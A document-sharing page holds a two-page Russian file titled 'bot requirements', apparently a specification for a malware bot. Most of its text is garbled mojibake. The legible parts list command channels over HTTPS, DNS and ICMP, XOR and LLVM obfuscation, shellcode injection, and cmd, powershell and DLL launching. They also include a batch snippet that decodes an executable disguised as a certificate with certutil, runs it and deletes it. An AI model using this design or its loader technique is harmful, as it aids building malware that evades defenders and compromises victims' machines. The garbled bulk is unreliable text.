требования к боту

Загружено:

kokoska 41
0 просмотров2 страницы

Авторское право

© © All Rights Reserved

Этот документ был вам полезен?

Это неприемлемый материал?

Пожаловаться на этот документ

Авторское право:

© All Rights Reserved
Отметить как неприемлемый контент
0 просмотров2 страницы

требования к боту

Загружено:

kokoska 41

Авторское право:

© All Rights Reserved
Отметить как неприемлемый контент
из 2

���������� � ����

1. ����� ���� � ��������


- ������������� �������� �� �������� � ����.���� ����������: HTTPS, DNS, ICMP
- �������������� ������� ����
- ���������� ������� (�������� �� �������� ������� ��� ��� ���-������
�������������, ��� ��� �� �������� ���������)
- ����� ���������� ������� � ������� ������ ���� ��������� ������� (����������)
- �������������� ���������� �������, � �������� ������ �� ��������� �������
- ������� �� �������� ��������. � ������, �� json/xml/��� - ����� ��� �������
�������, ���� ����� ��� ���
- ���������� ��������. �������� ��������� ������

2. �������� (stateless-���)
- ����� ������� �� ����� ����� ���� ��� �������, ID, �� � ������, �� � �������,
�����
�� ���� ��� ������ ���� "���������������" - ��������� ������ � ���, �������������
���� �� ���������� �������,
���������� � ������� � ���������� ������, ���������� �� ����������� ������� ��� �
�������.
- ����� ���������� � � ��������� - ������������ ���������� �������, ���������������
������ ������ ����� ��������.
��������: ���� �� ���� ������� ����, � � ���� ������ ������ ���������������, ��
������� ����� ����� ����� ������.
� ��������, ���� ��� ����-�� ������� �� �������, � ���� ���������, ������ ����
������ ����� �� ������ ������.

3. �����������
- ���������� ������������ �������� ����������
- ���������� ������������� ������������� �� ����������.
��������, ��������� �� ��� ���, � ��� ����� ������:

@echo off
REM ������� ��������� �� "�����������"
certutil -decode file.crt file.exe
REM ��������� ���������
file.exe
REM ���� ���� ���������� � ���������� ����
ping -n 300 127.0.0.1 > NUL
REM ������ ���������, �.�. ��� ��� ����� ���������� � ��������� ��������
del /f /y file.exe

�� ���� ��������� �������� ��������� �� �� ���������� � ������� ��������, ������ ��


���� ���������� �������.
����� ����� ������������ �������� � ��������, �������� ����� ��� - ���� �� ������
������ ���������� ��������, �������� ���� ������� ��������.
- ���������� ���������� ���� �� ��������� � ��������

4. �������� ����
���������� ������ ��� ������� �� ��������� �������.
- ��������� ����� � ��������� �������, ������������ ������������������� ��������
- ��� ������������� ��������� ����-����, ���������� ������� �������� - XOR
������������ ���� XOR 1 ����.
- �������� �� ��������� �� �����, ������ ��� ������ ��������� ������ ������ ��
�����
- ����� ������� �����������
- ������������� ���� �����, ������ �� ��������, ������� ���������, �� ����������
������� � ������� ��������
- ���� ��������, ������ �� ���� �������� (��������� ��� ����� ��)
- ����� ������������ LLVM-���������� �� ������

5. ����������
- ������ ����������� �������, �� �����. ������ �� ���������� �� ����
- ������� cmd-����� (����������)
- ������� powershell-����� (����������)
- ���������� ������������� shell-����
https://github.com/DimopoulosElias/SimpleShellcodeInjector/blob/master/
SimpleShellcodeInjector.c
- ���������� .exe-����� (����������)
- ������ .dll (rundll, regsvr) ����������

6. ���������� ��������
- ��� ������ ��������� � ���� ������������� �������, �� ������ ������ �������������
�������� ����� ���� �������

7. ��������������
- ��� ������ ��������������� ��������������

Похожие интересы

Вам также может понравиться